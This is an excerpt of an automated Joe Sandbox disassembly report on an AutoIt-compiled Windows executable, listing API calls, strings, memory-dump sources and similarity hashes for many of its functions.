• LoadCursorW.USER32(00000000,00007F00), ref: 00F379D1
• LoadCursorW.USER32(00000000,00007F03), ref: 00F379DC
• LoadCursorW.USER32(00000000,00007F8B), ref: 00F379E7
• LoadCursorW.USER32(00000000,00007F01), ref: 00F379F2
• LoadCursorW.USER32(00000000,00007F81), ref: 00F379FD
• LoadCursorW.USER32(00000000,00007F88), ref: 00F37A08
• LoadCursorW.USER32(00000000,00007F80), ref: 00F37A13
• LoadCursorW.USER32(00000000,00007F86), ref: 00F37A1E
• LoadCursorW.USER32(00000000,00007F83), ref: 00F37A29
• LoadCursorW.USER32(00000000,00007F85), ref: 00F37A34
• LoadCursorW.USER32(00000000,00007F82), ref: 00F37A3F
• LoadCursorW.USER32(00000000,00007F84), ref: 00F37A4A
• LoadCursorW.USER32(00000000,00007F04), ref: 00F37A55
• LoadCursorW.USER32(00000000,00007F02), ref: 00F37A60
• LoadCursorW.USER32(00000000,00007F89), ref: 00F37A6B
• GetCursorInfo.USER32(?), ref: 00F37A7B
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 7b4e4a9bac59e3bca4c9b789f1506964962727bda3ec6ae9bf6b6592127f1ed2
• Instruction ID: 8f286364869b690bb32ea6ed3a2571a794916ed6e61b8ee24145dc8b39cb0fa5
• Opcode Fuzzy Hash: 7b4e4a9bac59e3bca4c9b789f1506964962727bda3ec6ae9bf6b6592127f1ed2
• Instruction Fuzzy Hash: 8E3117B1D0831E6ADF609FB68C8995FBFE8FF04760F50452AE50DE7180DA78A5009FA1
APIs
  • Part of subcall function 00EFE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00EEC8B7,?,00002000,?,?,00000000,?,00EE419E,?,?,?,00F7DC00), ref: 00EFE984
  • Part of subcall function 00EE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00EE53B1,?,?,00EE61FF,?,00000000,00000001,00000000), ref: 00EE662F
• __wsplitpath.LIBCMT ref: 00EEC93E
  • Part of subcall function 00F01DFC: __wsplitpath_helper.LIBCMT ref: 00F01E3C
• _wcscpy.LIBCMT ref: 00EEC953
• _wcscat.LIBCMT ref: 00EEC968
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00EEC978
• SetCurrentDirectoryW.KERNEL32(?), ref: 00EECABE
  • Part of subcall function 00EEB337: _wcscpy.LIBCMT ref: 00EEB36F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 2258743419-1018226102
• Opcode ID: 63f2bee6bf02ad809ecd2efae876c982bfd3d18961a9fb55748268a04bf66f2b
• Instruction ID: 51e529e110ff27e8fa6879df78c215a775b3bca845710d543a3466a8048cf00a
• Opcode Fuzzy Hash: 63f2bee6bf02ad809ecd2efae876c982bfd3d18961a9fb55748268a04bf66f2b
• Instruction Fuzzy Hash: 1C12C2715083859FC724EF25C841AAFBBE4BF88354F10492DF989A32A1DB30DA49DB53
APIs
• _memset.LIBCMT ref: 00F4CEFB
• DestroyWindow.USER32(?,?), ref: 00F4CF73
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00F4CFF4
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00F4D016
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4D025
• DestroyWindow.USER32(?), ref: 00F4D042
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00EE0000,00000000), ref: 00F4D075
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F4D094
• GetDesktopWindow.USER32 ref: 00F4D0A9
• GetWindowRect.USER32(00000000), ref: 00F4D0B0
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00F4D0C2
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00F4D0DA
  • Part of subcall function 00EFB526: GetWindowLongW.USER32(?,000000EB), ref: 00EFB537
Strings
Memory Dump Source
• Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
• String ID: 0$tooltips_class32
• API String ID: 3877571568-3619404913
• Opcode ID: 9a91547bc492849419e3b17f05a6aa2922e1397a8c4f3de0f76e81625c2cfab2
• Instruction ID: 0203d3d44d1c1e536ecfa11e129e23b3843595d1c807295830023411327fa4c3
• Opcode Fuzzy Hash: 9a91547bc492849419e3b17f05a6aa2922e1397a8c4f3de0f76e81625c2cfab2
• Instruction Fuzzy Hash: 2271DEB4A40309AFD720CF28CC84F6A3BE5FB89714F08451DF985972A1D775E842EB22
APIs
  • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
• DragQueryPoint.SHELL32(?,?), ref: 00F4F37A
  • Part of subcall function 00F4D7DE: ClientToScreen.USER32(?,?), ref: 00F4D807
  • Part of subcall function 00F4D7DE: GetWindowRect.USER32(?,?), ref: 00F4D87D
  • Part of subcall function 00F4D7DE: PtInRect.USER32(?,?,00F4ED5A), ref: 00F4D88D
• SendMessageW.USER32(?,000000B0,?,?), ref: 00F4F3E3
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F4F3EE
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F4F411
• _wcscat.LIBCMT ref: 00F4F441
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F4F458
• SendMessageW.USER32(?,000000B0,?,?), ref: 00F4F471
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F4F488
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00F4F4AA
                                                                                        • DragFinish.SHELL32(?), ref: 00F4F4B1
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00F4F59C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                        • API String ID: 169749273-3440237614
                                                                                        • Opcode ID: d41c6bc8486371769105e776c73a3d6f32c27de97acb62cbb659e8f4a5a44ae6
                                                                                        • Instruction ID: b2313d7a508fb3daada26131a6e186e6c44583d454dbca1d685c88123ae1237f
                                                                                        • Opcode Fuzzy Hash: d41c6bc8486371769105e776c73a3d6f32c27de97acb62cbb659e8f4a5a44ae6
                                                                                        • Instruction Fuzzy Hash: CB615B71508304AFC701EF65CC45EAFBBE8FF89710F000A1DF695A21A1DB719A09DB52
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00F2AB3D
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00F2AB46
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F2AB52
                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00F2AC40
                                                                                        • __swprintf.LIBCMT ref: 00F2AC70
                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00F2AC9C
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F2AD4D
                                                                                        • SysFreeString.OLEAUT32(00000016), ref: 00F2ADDF
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F2AE35
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F2AE44
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00F2AE80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                        • API String ID: 3730832054-3931177956
                                                                                        • Opcode ID: 8951b9e616a9ecd096857f83d734490cb39442755ec45178b0eb4886014ba98b
                                                                                        • Instruction ID: f88d3ec06b080921bb2a8eabcfadf1123097758122abde418f62bfc64e24bea5
                                                                                        • Opcode Fuzzy Hash: 8951b9e616a9ecd096857f83d734490cb39442755ec45178b0eb4886014ba98b
                                                                                        • Instruction Fuzzy Hash: 9BD1F172A04629DBDB20DF66E884B7AB7B5FF44B10F148495E415AB180DB74EC40FBA2
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F471FC
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F47247
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 5a49a0c021585a07f938eee7d426462da81c74184f9fd509a914f214b76987ae
                                                                                        • Instruction ID: 88222181b7a65d6437991f0eb7aae126ee0c0b4003727c5c82cba5075835af2a
                                                                                        • Opcode Fuzzy Hash: 5a49a0c021585a07f938eee7d426462da81c74184f9fd509a914f214b76987ae
                                                                                        • Instruction Fuzzy Hash: CD915D352087459BCB04EF10C851A6EBBE1AF94310F005869FD966B3A3DB75FD4AEB81
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F4E5AB
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F4BEAF), ref: 00F4E607
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4E647
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4E68C
                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F4E6C3
                                                                                        • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,00F4BEAF), ref: 00F4E6CF
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F4E6DF
                                                                                        • DestroyIcon.USER32(?,?,?,?,?,00F4BEAF), ref: 00F4E6EE
                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F4E70B
                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F4E717
                                                                                          • Part of subcall function 00F00FA7: __wcsicmp_l.LIBCMT ref: 00F01030
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                        • String ID: .dll$.exe$.icl
                                                                                        • API String ID: 1212759294-1154884017
                                                                                        • Opcode ID: 75859f341ff38f664466c88939d735865109e052036700124fae640d9eb65423
                                                                                        • Instruction ID: 92cf908b7c65d1f94770f021a1c732c6bccd2ea45e5b9f57cc3f6ec800ad75a1
                                                                                        • Opcode Fuzzy Hash: 75859f341ff38f664466c88939d735865109e052036700124fae640d9eb65423
                                                                                        • Instruction Fuzzy Hash: A961D171A50219BEEB24DF64CC46FBE7BA8BB18724F104115F911E60D1EBB4ED80EB60
                                                                                        APIs
                                                                                          • Part of subcall function 00EE936C: __swprintf.LIBCMT ref: 00EE93AB
                                                                                          • Part of subcall function 00EE936C: __itow.LIBCMT ref: 00EE93DF
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00F2D292
                                                                                        • GetDriveTypeW.KERNEL32 ref: 00F2D2DF
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2D327
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2D35E
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F2D38C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 1148790751-4113822522
                                                                                        • Opcode ID: 251238b173b567ad49a589d770148bc3e7188887bee84b6d4a06701637918e44
                                                                                        • Instruction ID: 962ba155e39e2c0b2ad52b1315fc909fc31877f4a69131ce5655133f3ec67bad
                                                                                        • Opcode Fuzzy Hash: 251238b173b567ad49a589d770148bc3e7188887bee84b6d4a06701637918e44
                                                                                        • Instruction Fuzzy Hash: 26517C715043489FC700EF11D88196EB3E4FF98758F10586CF89A672A2DB31EE06DB82
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00F53973,00000016,0000138C,00000016,?,00000016,00F7DDB4,00000000,?), ref: 00F226F1
                                                                                        • LoadStringW.USER32(00000000,?,00F53973,00000016), ref: 00F226FA
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00F53973,00000016,0000138C,00000016,?,00000016,00F7DDB4,00000000,?,00000016), ref: 00F2271C
                                                                                        • LoadStringW.USER32(00000000,?,00F53973,00000016), ref: 00F2271F
                                                                                        • __swprintf.LIBCMT ref: 00F2276F
                                                                                        • __swprintf.LIBCMT ref: 00F22780
                                                                                        • _wprintf.LIBCMT ref: 00F22829
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F22840
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 618562835-2268648507
                                                                                        • Opcode ID: a404c6e683e90872b11f3e4cdae0767616adb4ceb41606c0adecefbf9dc8c2de
                                                                                        • Instruction ID: 877dd26908a0f041e63aff246f9771c99d8e5239eda4049dc61b5633c9ad0c83
                                                                                        • Opcode Fuzzy Hash: a404c6e683e90872b11f3e4cdae0767616adb4ceb41606c0adecefbf9dc8c2de
                                                                                        • Instruction Fuzzy Hash: CA415E7290025CBADF14FBE1DD86EEEB7B8AF15344F100065F60576092EA74AF09EB61
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F2D0D8
                                                                                        • __swprintf.LIBCMT ref: 00F2D0FA
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F2D137
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F2D15C
                                                                                        • _memset.LIBCMT ref: 00F2D17B
                                                                                        • _wcsncpy.LIBCMT ref: 00F2D1B7
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F2D1EC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F2D1F7
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00F2D200
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F2D20A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                         • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                         • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        • Opcode ID: 98da1b2c540c82270b635c2c5270e92b198bf448eebea8bb304535b782a2d7fe
                                                                                        • Instruction ID: de66a6951eb62e64b25c488932d2b8b21d048d717bd9d46a97ebee422469b7dc
                                                                                        • Opcode Fuzzy Hash: 98da1b2c540c82270b635c2c5270e92b198bf448eebea8bb304535b782a2d7fe
                                                                                        • Instruction Fuzzy Hash: 2831A372A00119ABDB21DFA0DC49FEB77BCEF89741F1040B6F519D21A1EB74D644AB24
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F4BEF4,?,?), ref: 00F4E754
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E76B
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E776
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E783
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F4E78C
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E79B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F4E7A4
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E7AB
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F4BEF4,?,?,00000000,?), ref: 00F4E7BC
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F6D9BC,?), ref: 00F4E7D5
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00F4E7E5
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00F4E809
                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F4E834
                                                                                        • DeleteObject.GDI32(00000000), ref: 00F4E85C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F4E872
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3840717409-0
                                                                                        • Opcode ID: 0e0199693c9aa650c44d4d8cd89c7b3e784d0809d0a565ed10ec679919a17642
                                                                                        • Instruction ID: 0e64a3edc84cf51130d32da793ca8aa87fc8bdc832dae225d9ea40f50c5e0bbd
                                                                                        • Opcode Fuzzy Hash: 0e0199693c9aa650c44d4d8cd89c7b3e784d0809d0a565ed10ec679919a17642
                                                                                        • Instruction Fuzzy Hash: 1C414B75A00208FFDB119F65DC88EAA7BB8FF89721F108158F926D7260D7B19D41EB20
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 00F3076F
                                                                                        • _wcscat.LIBCMT ref: 00F30787
                                                                                        • _wcscat.LIBCMT ref: 00F30799
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F307AE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F307C2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F307DA
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F307F4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F30806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        • API String ID: 34673085-438819550
                                                                                        • Opcode ID: d3a202ff9a54f100a259721ccf8606fb2725d517ddfa9c0f8d5bdad7e9ecc6c3
                                                                                        • Instruction ID: c6e810fe8b32a2558b16e8640f48b1d11a1b42194586839a9441b8dda9043f00
                                                                                        • Opcode Fuzzy Hash: d3a202ff9a54f100a259721ccf8606fb2725d517ddfa9c0f8d5bdad7e9ecc6c3
                                                                                        • Instruction Fuzzy Hash: CA819272A043459FCB24DF24C86596EB3E8BBC8324F14882FF885D7251EB34D954EB52
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F4EF3B
                                                                                        • GetFocus.USER32 ref: 00F4EF4B
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00F4EF56
                                                                                        • _memset.LIBCMT ref: 00F4F081
                                                                                        • GetMenuItemInfoW.USER32 ref: 00F4F0AC
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00F4F0CC
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00F4F0DF
                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00F4F113
